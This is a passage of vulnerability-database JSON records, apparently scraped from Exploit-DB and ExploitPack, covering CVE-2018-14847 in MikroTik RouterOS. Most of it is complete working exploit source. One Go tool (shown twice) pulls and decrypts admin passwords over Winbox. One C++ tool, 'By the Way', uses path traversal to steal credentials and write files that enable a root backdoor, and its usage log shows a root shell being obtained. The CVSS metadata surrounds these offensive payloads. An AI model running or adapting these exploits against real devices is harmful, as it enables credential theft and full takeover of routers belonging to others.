{\n\t\t\t\tbreak\n\t\t\t}\n\t\t\t// fmt.Printf(\"SORn: 0x%X\\n\", i)\n\n\t\t\t// comment?\n\t\t\ti += 18\n\t\t\tif (i + 4) >= len(buff) {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tif (!((buff[i+1] == 0x11) && (buff[i+2] == 0x20) && (buff[i+3] == 0x20) && (buff[i+4] == 0x21))) && (buff[i-5] == 0x03 && (buff[i] != 0x00)) {\n\t\t\t\tif (i+1)+int(buff[i]) >= len(buff) {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t\ti += int(buff[i])\n\t\t\t} else {\n\t\t\t\ti -= 18\n\t\t\t}\n\n\t\t\t//searching for StartOfPassword\n\t\t\tif i+4 >= len(buff) {\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\tfor !((buff[i] == 0x11) && (buff[i+3] == 0x21) && ((buff[i+4] % byte(0x10)) == 0)) {\n\t\t\t\ti++\n\t\t\t\tif i+4 >= len(buff) {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\t\t\ti += 5\n\t\t\tif (i + 3) >= len(buff) {\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\tif (buff[i-1] != 0x00) && !((buff[i] == 0x01) && ((buff[i+1] == 0x20 && buff[i+2] == 0x20) || (buff[i+1] == 0x00 && 
buff[i+2] == 0x00)) && (buff[i+3] == 0x21)) {\n\t\t\t\tpwd = buf[i-1+1 : int(buf[i-1])+i-1+1]\n\t\t\t\ti += int(buff[i-1])\n\t\t\t}\n\n\t\t\t//searching for StartOfUsername\n\t\t\tif i+3 >= len(buff) {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tfor !((buff[i] == 0x01) && (buff[i+3] == 0x21)) {\n\t\t\t\ti++\n\t\t\t\tif i+3 >= len(buff) {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\n\t\t\ti += 4\n\t\t\tif i >= len(buff) {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tif buff[i] != 0x00 {\n\t\t\t\tif i+int(buff[i]) >= len(buff) {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\n\t\t\t\tusr = ASCIIonly(buff[i+1 : int(buff[i])+i+1])\n\t\t\t\ti += int(buff[i])\n\t\t\t}\n\n\t\t\tdecrypted := decryptPassword(usr, pwd)\n\t\t\t//fmt.Printf(\" --> %s\\t%s\\n\", buff[i], decrypted)\n\n\t\t\tif len(usr) != 0 {\n\t\t\t\ts = append(s, strings.Join([]string{string(usr), string(decrypted)}, \":\"))\n\t\t\t}\n\n\t\t}\n\t}\n\n\treturn s\n}\n\nfunc main() {\n\n\tif len(os.Args) < 2 {\n\t\tfmt.Printf(\" [ usage: %s 192.168.88.1\\n\\n\", os.Args[0])\n\t\tos.Exit(0)\n\t}\n\n\tconn, err := net.DialTimeout(\"tcp\", os.Args[1]+\":8291\", time.Duration(3*time.Second))\n\n\tif err != nil {\n\t\tfmt.Println(err.Error())\n\t\treturn\n\t}\n\n\tdefer conn.Close()\n\n\tconn.Write(a)\n\treqLen, err := conn.Read(buf)\n\tcheckErr(err)\n\tif reqLen < 38 {\n\t\tpanic(\"First packet is too small\")\n\t}\n\n\tb[19] = buf[38]\n\n\tconn.Write(b)\n\treqLen, err = conn.Read(buf)\n\tcheckErr(err)\n\tdb := buf[:reqLen]\n\n\ts := extractPass(db)\n\tfor i, acc := range s {\n\t\tdata := strings.SplitN(acc, \":\", 2)\n\t\tfmt.Printf(\" [%d] %s\\t%s\\n\", i, data[0], data[1])\n\t}\n}", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-04-01T19:04:31", "description": "\nMicroTik RouterOS 6.43rc3 - Remote Root", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", 
"integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2018-10-10T00:00:00", "type": "exploitpack", "title": "MicroTik RouterOS 6.43rc3 - Remote Root", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2018-10-10T00:00:00", "id": "EXPLOITPACK:71B40F77201BD20B165A2CC309F0C281", "href": "", "sourceData": "/*\n# Exploit Title: RouterOS Remote Rooting\n# Date: 10/07/2018\n# Exploit Author: Jacob Baines\n# Vendor Homepage: www.mikrotik.com\n# Software Link: https://mikrotik.com/download\n# Version: Longterm: 6.30.1 - 6.40.7 Stable: 6.29 - 6.42 Beta: 6.29rc1 - 6.43rc3\n# Tested on: RouterOS Various\n# CVE : CVE-2018-14847\n\nBy the Way is an exploit coded in C++ that enables a root shell on Mikrotik devices running RouterOS versions:\n\nLongterm: 6.30.1 - 6.40.7\nStable: 6.29 - 6.42\nBeta: 6.29rc1 - 6.43rc3\n\nThe exploit can be found here: https://github.com/tenable/routeros/tree/master/poc/bytheway\n\nThe exploit leverages the path traversal vulnerability CVE-2018-14847 to extract the admin password and create an \"option\" package to enable the developer backdoor. Post exploitation the attacker can connect to Telnet or SSH using the root user \"devel\" with the admin's password.\n\nMikrotik patched CVE-2018-14847 back in April. 
However, until this PoC was written, I don't believe it's been publicly disclosed that the attack can be leveraged to write files. You can find Mikrotik's advisory here:\n\nhttps://blog.mikrotik.com/security/winbox-vulnerability.html\n\nNote that, while this exploit is written for Winbox, it could be ported to HTTP as long as you had prior knowledge of the admin credentials.\n\n# Usage Example\n\nalbinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251\nTrying 192.168.1.251...\nConnected to 192.168.1.251.\nEscape character is '^]'.\nPassword: \nLogin failed, incorrect username or password\n\nConnection closed by foreign host.\nalbinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ ./btw -i 192.168.1.251\n\n \u2554\u2557 \u252c \u252c \u250c\u252c\u2510\u252c \u252c\u250c\u2500\u2510 \u2566 \u2566\u250c\u2500\u2510\u252c \u252c\n \u2560\u2569\u2557\u2514\u252c\u2518 \u2502 \u251c\u2500\u2524\u251c\u2524 \u2551\u2551\u2551\u251c\u2500\u2524\u2514\u252c\u2518\n \u255a\u2550\u255d \u2534 \u2534 \u2534 \u2534\u2514\u2500\u2518 \u255a\u2569\u255d\u2534 \u2534 \u2534 \n\n[+] Extracting passwords from 192.168.1.251:8291\n[+] Searching for administrator credentials \n[+] Using credentials - admin:lol\n[+] Creating /pckg/option on 192.168.1.251:8291\n[+] Creating /flash/nova/etc/devel-login on 192.168.1.251:8291\n[+] There's a light on\nalbinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251\nTrying 192.168.1.251...\nConnected to 192.168.1.251.\nEscape character is '^]'.\nPassword: \n\n\nBusyBox v1.00 (2017.03.02-08:29+0000) Built-in shell (ash)\nEnter 'help' for a list of built-in commands.\n\n# uname -a\nLinux MikroTik 3.3.5 #1 Thu Mar 2 08:16:25 UTC 2017 mips unknown\n# cat /rw/logs/VERSION\nv6.38.4 Mar/08/2017 09:26:17\n# Connection closed by foreign host.\n*/\n#include <sstream>\n#include <cstdlib>\n#include <iostream>\n#include <boost/cstdint.hpp>\n#include <boost/program_options.hpp>\n\n#include 
\"winbox_session.hpp\"\n#include \"winbox_message.hpp\"\n#include \"md5.hpp\"\n\nnamespace\n{\n const char s_version[] = \"By the Way 1.0.0\";\n\n /*!\n * Parses the command line arguments. The program will always use two\n * parameters (ip and winbox port) but the port will default to 8291 if\n * not present on the CLI\n *\n * \\param[in] p_arg_count the number of arguments on the command line\n * \\param[in] p_arg_array the arguments passed on the command line\n * \\param[in,out] p_ip the ip address to connect to\n * \\param[in,out] p_winbox_port the winbox port to connect to\n * \\return true if we have valid ip and ports. false otherwise.\n */\n bool parseCommandLine(int p_arg_count, const char* p_arg_array[],\n std::string& p_ip, std::string& p_winbox_port)\n {\n boost::program_options::options_description description(\"options\");\n description.add_options()\n (\"help,h\", \"A list of command line options\")\n (\"version,v\", \"Display version information\")\n (\"winbox-port,w\", boost::program_options::value<std::string>()->default_value(\"8291\"), \"The winbox port\")\n (\"ip,i\", boost::program_options::value<std::string>(), \"The ip to connect to\");\n\n boost::program_options::variables_map argv_map;\n try\n {\n boost::program_options::store(\n boost::program_options::parse_command_line(\n p_arg_count, p_arg_array, description), argv_map);\n }\n catch (const std::exception& e)\n {\n std::cerr << e.what() << \"\\n\" << std::endl;\n std::cerr << description << std::endl;\n return false;\n }\n\n boost::program_options::notify(argv_map);\n if (argv_map.empty() || argv_map.count(\"help\"))\n {\n std::cerr << description << std::endl;\n return false;\n }\n\n if (argv_map.count(\"version\"))\n {\n std::cerr << \"Version: \" << ::s_version << std::endl;\n return false;\n }\n\n if (argv_map.count(\"ip\") && argv_map.count(\"winbox-port\"))\n {\n p_ip.assign(argv_map[\"ip\"].as<std::string>());\n p_winbox_port.assign(argv_map[\"winbox-port\"].as<std::string>());\n 
return true;\n }\n else\n {\n std::cerr << description << std::endl;\n }\n\n return false;\n }\n\n /*!\n * This function uses the file disclosure vulnerability, CVE-2018-14847, to\n * download the user database from /flash/rw/store/user.dat\n *\n * \\param[in] p_ip the address of the router to connect to\n * \\param[in] p_winbox_port the winbox port to connect to\n * \\return a string containing the user.dat data or an empty string on error\n */\n std::string getPasswords(const std::string& p_ip, const std::string& p_winbox_port)\n {\n std::cout << \"[+] Extracting passwords from \" << p_ip << \":\" << p_winbox_port << std::endl;\n Winbox_Session winboxSession(p_ip, p_winbox_port);\n if (!winboxSession.connect())\n {\n std::cerr << \"[!] Failed to connect to the remote host\" << std::endl;\n return std::string();\n }\n\n WinboxMessage msg;\n msg.set_to(2, 2);\n msg.set_command(7);\n msg.set_request_id(1);\n msg.set_reply_expected(true);\n msg.add_string(1, \"//./.././.././../flash/rw/store/user.dat\");\n winboxSession.send(msg);\n\n msg.reset();\n if (!winboxSession.receive(msg))\n {\n std::cerr << \"[!] Error receiving an open file response.\" << std::endl;\n return std::string();\n }\n\n boost::uint32_t sessionID = msg.get_session_id();\n boost::uint16_t file_size = msg.get_u32(2);\n if (file_size == 0)\n {\n std::cerr << \"[!] File size is 0\" << std::endl;\n return std::string();\n }\n\n msg.reset();\n msg.set_to(2, 2);\n msg.set_command(4);\n msg.set_request_id(2);\n msg.set_reply_expected(true);\n msg.set_session_id(sessionID);\n msg.add_u32(2, file_size);\n winboxSession.send(msg);\n\n msg.reset();\n if (!winboxSession.receive(msg))\n {\n std::cerr << \"[!] Error receiving a file content response.\" << std::endl;\n return std::string();\n }\n\n return msg.get_raw(0x03);\n }\n\n /*!\n * Looks through the user.dat file for an enabled administrative account that\n * we can use. 
Once a useful account is found the password is decrypted.\n *\n * \\param[in] p_user_dat the user.dat file data\n * \\param[in,out] p_username stores the found admin username\n * \\param[in,out] p_password stores the found admin password\n * \\return true on success and false otherwise\n */\n bool get_password(const std::string p_user_dat, std::string& p_username, std::string& p_password)\n {\n std::cout << \"[+] Searching for administrator credentials \" << std::endl;\n\n // the dat file is a series of nv::messages preceded by a two byte length\n std::string dat(p_user_dat);\n while (dat.size() > 4)\n {\n boost::uint16_t length = *reinterpret_cast<const boost::uint16_t*>(&dat[0]);\n if (dat[2] != 'M' || dat[3] != '2')\n {\n // this is mild insanity but the .dat file messages don't line\n // up properly if a new user is added or whatever.\n dat.erase(0, 1);\n continue;\n }\n dat.erase(0, 4);\n length -= 4;\n\n if (length > dat.size())\n {\n return false;\n }\n\n std::string entry(dat.data(), length);\n dat.erase(0, length);\n\n WinboxMessage msg;\n msg.parse_binary(entry);\n\n // we need an active admin account\n // 0x2 has three groups: 1 (read), 2 (write), 3 (full)\n if (msg.get_u32(2) == 3 && msg.get_boolean(0xfe000a) == false)\n {\n p_username.assign(msg.get_string(1));\n\n std::string encrypted_pass(msg.get_string(0x11));\n if (!encrypted_pass.empty() && msg.get_u32(0x1f) != 0)\n {\n std::string hash_this(p_username);\n hash_this.append(\"283i4jfkai3389\");\n\n MD5 md5;\n md5.update(hash_this.c_str(), hash_this.size());\n md5.finalize();\n std::string md5_hash(md5.getDigest());\n\n for (std::size_t i = 0; i < encrypted_pass.size(); i++)\n {\n boost::uint8_t decrypted = encrypted_pass[i] ^ md5_hash[i % md5_hash.size()];\n if (decrypted == 0)\n {\n // a null terminator! 
We did it.\n return true;\n }\n p_password.push_back(decrypted);\n }\n p_password.clear();\n }\n }\n }\n return false;\n }\n}\n\n/*!\n * This function creates the file /pckg/option on the target. This will enable\n * the developer login on Telnet and SSH. Oddly, you'll first need to log in\n * to Telnet for SSH to work, but I digress...\n *\n * \\param[in] p_ip the ip address of the router\n * \\param[in] p_port the port of the jsproxy we'll connect to\n * \\param[in] p_username the username we'll authenticate with\n * \\param[in] p_password the password we'll authenticate with\n * \\return true if we successfully created the file.\n */\nbool create_file(const std::string& p_ip, const std::string& p_port,\n const std::string& p_username, const std::string& p_password)\n{\n Winbox_Session mproxy_session(p_ip, p_port);\n if (!mproxy_session.connect())\n {\n std::cerr << \"[-] Failed to connect to the remote host\" << std::endl;\n return false;\n }\n\n boost::uint32_t p_session_id = 0;\n if (!mproxy_session.login(p_username, p_password, p_session_id))\n {\n std::cerr << \"[-] Login failed.\" << std::endl;\n return false;\n }\n\n std::cout << \"[+] Creating /pckg/option on \" << p_ip << \":\" << p_port << std::endl;\n\n WinboxMessage msg;\n msg.set_to(2, 2);\n msg.set_command(1);\n msg.set_request_id(1);\n msg.set_reply_expected(true);\n msg.set_session_id(p_session_id);\n msg.add_string(1, \"//./.././.././../pckg/option\");\n mproxy_session.send(msg);\n\n msg.reset();\n mproxy_session.receive(msg);\n if (msg.has_error())\n {\n std::cout << \"[-] \" << msg.get_error_string() << std::endl;\n return false;\n }\n\n std::cout << \"[+] Creating /flash/nova/etc/devel-login on \" << p_ip << \":\" << p_port << std::endl;\n msg.reset();\n msg.set_to(2, 2);\n msg.set_command(1);\n msg.set_request_id(2);\n msg.set_reply_expected(true);\n msg.set_session_id(p_session_id);\n msg.add_string(1, \"//./.././.././../flash/nova/etc/devel-login\");\n mproxy_session.send(msg);\n\n 
msg.reset();\n mproxy_session.receive(msg);\n if (msg.has_error())\n {\n std::cout << \"[-] \" << msg.get_error_string() << std::endl;\n return false;\n }\n\n return true;\n}\n\nint main(int p_argc, const char** p_argv)\n{\n std::string ip;\n std::string winbox_port;\n if (!parseCommandLine(p_argc, p_argv, ip, winbox_port))\n {\n return EXIT_FAILURE;\n }\n\n std::cout << std::endl;\n std::cout << \" \u2554\u2557 \u252c \u252c \u250c\u252c\u2510\u252c \u252c\u250c\u2500\u2510 \u2566 \u2566\u250c\u2500\u2510\u252c \u252c\" << std::endl;\n std::cout << \" \u2560\u2569\u2557\u2514\u252c\u2518 \u2502 \u251c\u2500\u2524\u251c\u2524 \u2551\u2551\u2551\u251c\u2500\u2524\u2514\u252c\u2518\" << std::endl;\n std::cout << \" \u255a\u2550\u255d \u2534 \u2534 \u2534 \u2534\u2514\u2500\u2518 \u255a\u2569\u255d\u2534 \u2534 \u2534 \" << std::endl;\n std::cout << std::endl;\n\n // step one - do the file disclosure\n std::string user_dat(getPasswords(ip, winbox_port));\n if (user_dat.empty())\n {\n return EXIT_FAILURE;\n }\n\n // step two - parse the password\n std::string admin_username;\n std::string admin_password;\n if (!get_password(user_dat, admin_username, admin_password))\n {\n std::cout << \"[-] Failed to find admin creds. 
Trying default.\" << std::endl;\n admin_username.assign(\"admin\");\n admin_password.assign(\"\");\n }\n\n std::cout << \"[+] Using credentials - \" << admin_username << \":\" << admin_password << std::endl;\n\n // step three - create the file\n if (!create_file(ip, winbox_port, admin_username, admin_password))\n {\n return EXIT_FAILURE;\n }\n\n std::cout << \"[+] There's a light on\" << std::endl;\n return EXIT_SUCCESS;\n}", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "exploitdb": [{"lastseen": "2023-08-07T07:53:59", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2018-08-17T00:00:00", "type": "exploitdb", "title": "Mikrotik WinBox 6.42 - Credential Disclosure (golang)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2018-08-17T00:00:00", "id": "EDB-ID:45209", "href": "https://www.exploit-db.com/exploits/45209", "sourceData": "/*\r\n\r\n# Title: Mikrotik WinBox 6.42 - Credential Disclosure ( golang edition )\r\n# Author: Maxim Yefimenko ( @slider )\r\n# Date: 2018-08-06\r\n# Software Link: https://mikrotik.com/download\r\n# Vendor 
Page: https://www.mikrotik.com/\r\n# Version: 6.29 - 6.42\r\n# Tested on: Fedora 28 \\ Debian 9 \\ Windows 10 \\ Android ( wherever it was possible to compile.. it's golang ^_^ )\r\n# CVE: CVE-2018-14847\r\n# References:\r\n# ( Alireza Mosajjal ) https://github.com/mosajjal https://n0p.me/winbox-bug-dissection/\r\n# ( BasuCert ) https://github.com/BasuCert/WinboxPoC\r\n# ( manio ) https://github.com/manio/mtpass/blob/master/mtpass.cpp\r\n# and special thanks to Dmitriy_Area51\r\n\r\n*/\r\n\r\npackage main\r\n\r\nimport (\r\n\t\"crypto/md5\"\r\n\t\"fmt\"\r\n\t\"net\"\r\n\t\"os\"\r\n\t\"strings\"\r\n\t\"time\"\r\n)\r\n\r\nvar (\r\n\ta = []byte{0x68, 0x01, 0x00, 0x66, 0x4d, 0x32, 0x05, 0x00,\r\n\t\t0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x05, 0x07,\r\n\t\t0x00, 0xff, 0x09, 0x07, 0x01, 0x00, 0x00, 0x21,\r\n\t\t0x35, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2e, 0x2f,\r\n\t\t0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f,\r\n\t\t0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f,\r\n\t\t0x2f, 0x2f, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x66,\r\n\t\t0x6c, 0x61, 0x73, 0x68, 0x2f, 0x72, 0x77, 0x2f,\r\n\t\t0x73, 0x74, 0x6f, 0x72, 0x65, 0x2f, 0x75, 0x73,\r\n\t\t0x65, 0x72, 0x2e, 0x64, 0x61, 0x74, 0x02, 0x00,\r\n\t\t0xff, 0x88, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n\t\t0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0x88,\r\n\t\t0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00,\r\n\t\t0x00, 0x00}\r\n\r\n\tb = []byte{0x3b, 0x01, 0x00, 0x39, 0x4d, 0x32, 0x05, 0x00,\r\n\t\t0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x06, 0x01,\r\n\t\t0x00, 0xfe, 0x09, 0x35, 0x02, 0x00, 0x00, 0x08,\r\n\t\t0x00, 0x80, 0x00, 0x00, 0x07, 0x00, 0xff, 0x09,\r\n\t\t0x04, 0x02, 0x00, 0xff, 0x88, 0x02, 0x00, 0x00,\r\n\t\t0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01,\r\n\t\t0x00, 0xff, 0x88, 0x02, 0x00, 0x02, 0x00, 0x00,\r\n\t\t0x00, 0x02, 0x00, 0x00, 0x00}\r\n\r\n\tbuf = make([]byte, 1024*8)\r\n)\r\n\r\nfunc checkErr(err error) {\r\n\tif err != nil {\r\n\t\tfmt.Println(\"Error:\" + err.Error())\r\n\t}\r\n}\r\n\r\nfunc decryptPassword(user 
[]byte, passEnc []byte) string {\r\n\tvar passw []byte\r\n\thasher := md5.New()\r\n\thasher.Write(user)\r\n\thasher.Write([]byte(\"283i4jfkai3389\"))\r\n\tkey := hasher.Sum(nil)\r\n\r\n\tfor i := 0; i < len(passEnc); i++ {\r\n\t\tpassw = append(passw, passEnc[i]^key[i%len(key)])\r\n\t}\r\n\r\n\treturn string(ASCIIonly(passw))\r\n}\r\n\r\nfunc ASCIIonly(s []byte) []byte {\r\n\tfor i, c := range s {\r\n\t\tif c < 32 || c > 126 {\r\n\t\t\treturn s[:i]\r\n\t\t}\r\n\t}\r\n\treturn s\r\n}\r\n\r\nfunc extractPass(buff []byte) (s []string) {\r\n\tvar (\r\n\t\tusr []byte\r\n\t\tpwd []byte\r\n\t)\r\n\r\n\t//searching for StartOfRecord\r\n\tfor i := 0; i < len(buff); i++ {\r\n\r\n\t\tif i+2 >= len(buff) {\r\n\t\t\tbreak\r\n\t\t}\r\n\r\n\t\tif (buff[i] == 0x4d) && (buff[i+1] == 0x32) && (buff[i+2] == 0x0a || buff[i+2] == 0x10) {\r\n\t\t\t// fmt.Printf(\"Probably user record at offset 0x%.5x\\n\", i)\r\n\r\n\t\t\t//some bytes ahead is enable/disable flag\r\n\t\t\ti += int((buff[i+2] - 5))\r\n\t\t\tif i >= len(buff) {\r\n\t\t\t\tbreak\r\n\t\t\t}\r\n\r\n\t\t\t//searching for StartOfRecNumber\r\n\t\t\tif i+3 >= len(buff) {\r\n\t\t\t\tbreak\r\n\t\t\t}\r\n\r\n\t\t\tfor !((buff[i] == 0x01) && ((buff[i+1] == 0x00) || (buff[i+1] == 0x20)) && (buff[i+3] == 0x09 || buff[i+3] == 0x20)) {\r\n\t\t\t\ti++\r\n\t\t\t\tif i+3 >= len(buff) {\r\n\t\t\t\t\tbreak\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\t\t\ti += 4\r\n\t\t\tif i >= len(buff) {\r\n\t\t\t\tbreak\r\n\t\t\t}\r\n\t\t\t// fmt.Printf(\"SORn: 0x%X\\n\", i)\r\n\r\n\t\t\t// comment?\r\n\t\t\ti += 18\r\n\t\t\tif (i + 4) >= len(buff) {\r\n\t\t\t\tbreak\r\n\t\t\t}\r\n\t\t\tif (!((buff[i+1] == 0x11) && (buff[i+2] == 0x20) && (buff[i+3] == 0x20) && (buff[i+4] == 0x21))) && (buff[i-5] == 0x03 && (buff[i] != 0x00)) {\r\n\t\t\t\tif (i+1)+int(buff[i]) >= len(buff) {\r\n\t\t\t\t\tbreak\r\n\t\t\t\t}\r\n\t\t\t\ti += int(buff[i])\r\n\t\t\t} else {\r\n\t\t\t\ti -= 18\r\n\t\t\t}\r\n\r\n\t\t\t//searching for StartOfPassword\r\n\t\t\tif i+4 >= len(buff) 
{\r\n\t\t\t\tbreak\r\n\t\t\t}\r\n\r\n\t\t\tfor !((buff[i] == 0x11) && (buff[i+3] == 0x21) && ((buff[i+4] % byte(0x10)) == 0)) {\r\n\t\t\t\ti++\r\n\t\t\t\tif i+4 >= len(buff) {\r\n\t\t\t\t\tbreak\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\ti += 5\r\n\t\t\tif (i + 3) >= len(buff) {\r\n\t\t\t\tbreak\r\n\t\t\t}\r\n\r\n\t\t\tif (buff[i-1] != 0x00) && !((buff[i] == 0x01) && ((buff[i+1] == 0x20 && buff[i+2] == 0x20) || (buff[i+1] == 0x00 && buff[i+2] == 0x00)) && (buff[i+3] == 0x21)) {\r\n\t\t\t\tpwd = buf[i-1+1 : int(buf[i-1])+i-1+1]\r\n\t\t\t\ti += int(buff[i-1])\r\n\t\t\t}\r\n\r\n\t\t\t//searching for StartOfUsername\r\n\t\t\tif i+3 >= len(buff) {\r\n\t\t\t\tbreak\r\n\t\t\t}\r\n\t\t\tfor !((buff[i] == 0x01) && (buff[i+3] == 0x21)) {\r\n\t\t\t\ti++\r\n\t\t\t\tif i+3 >= len(buff) {\r\n\t\t\t\t\tbreak\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\t\t\ti += 4\r\n\t\t\tif i >= len(buff) {\r\n\t\t\t\tbreak\r\n\t\t\t}\r\n\t\t\tif buff[i] != 0x00 {\r\n\t\t\t\tif i+int(buff[i]) >= len(buff) {\r\n\t\t\t\t\tbreak\r\n\t\t\t\t}\r\n\r\n\t\t\t\tusr = ASCIIonly(buff[i+1 : int(buff[i])+i+1])\r\n\t\t\t\ti += int(buff[i])\r\n\t\t\t}\r\n\r\n\t\t\tdecrypted := decryptPassword(usr, pwd)\r\n\t\t\t//fmt.Printf(\" --> %s\\t%s\\n\", buff[i], decrypted)\r\n\r\n\t\t\tif len(usr) != 0 {\r\n\t\t\t\ts = append(s, strings.Join([]string{string(usr), string(decrypted)}, \":\"))\r\n\t\t\t}\r\n\r\n\t\t}\r\n\t}\r\n\r\n\treturn s\r\n}\r\n\r\nfunc main() {\r\n\r\n\tif len(os.Args) < 2 {\r\n\t\tfmt.Printf(\" [ usage: %s 192.168.88.1\\n\\n\", os.Args[0])\r\n\t\tos.Exit(0)\r\n\t}\r\n\r\n\tconn, err := net.DialTimeout(\"tcp\", os.Args[1]+\":8291\", time.Duration(3*time.Second))\r\n\r\n\tif err != nil {\r\n\t\tfmt.Println(err.Error())\r\n\t\treturn\r\n\t}\r\n\r\n\tdefer conn.Close()\r\n\r\n\tconn.Write(a)\r\n\treqLen, err := conn.Read(buf)\r\n\tcheckErr(err)\r\n\tif reqLen < 38 {\r\n\t\tpanic(\"First packet is too small\")\r\n\t}\r\n\r\n\tb[19] = buf[38]\r\n\r\n\tconn.Write(b)\r\n\treqLen, err = conn.Read(buf)\r\n\tcheckErr(err)\r\n\tdb 
:= buf[:reqLen]\r\n\r\n\ts := extractPass(db)\r\n\tfor i, acc := range s {\r\n\t\tdata := strings.SplitN(acc, \":\", 2)\r\n\t\tfmt.Printf(\" [%d] %s\\t%s\\n\", i, data[0], data[1])\r\n\t}\r\n}", "sourceHref": "https://www.exploit-db.com/raw/45209", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-08-07T06:32:10", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2018-10-10T00:00:00", "type": "exploitdb", "title": "MicroTik RouterOS < 6.43rc3 - Remote Root", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2018-14847", "CVE-2018-14847"], "modified": "2018-10-10T00:00:00", "id": "EDB-ID:45578", "href": "https://www.exploit-db.com/exploits/45578", "sourceData": "/*\r\n# Exploit Title: RouterOS Remote Rooting\r\n# Date: 10/07/2018\r\n# Exploit Author: Jacob Baines\r\n# Vendor Homepage: www.mikrotik.com\r\n# Software Link: https://mikrotik.com/download\r\n# Version: Longterm: 6.30.1 - 6.40.7 Stable: 6.29 - 6.42 Beta: 6.29rc1 - 6.43rc3\r\n# Tested on: RouterOS Various\r\n# CVE : CVE-2018-14847\r\n\r\nBy the Way is an exploit coded in C++ that enables a root 
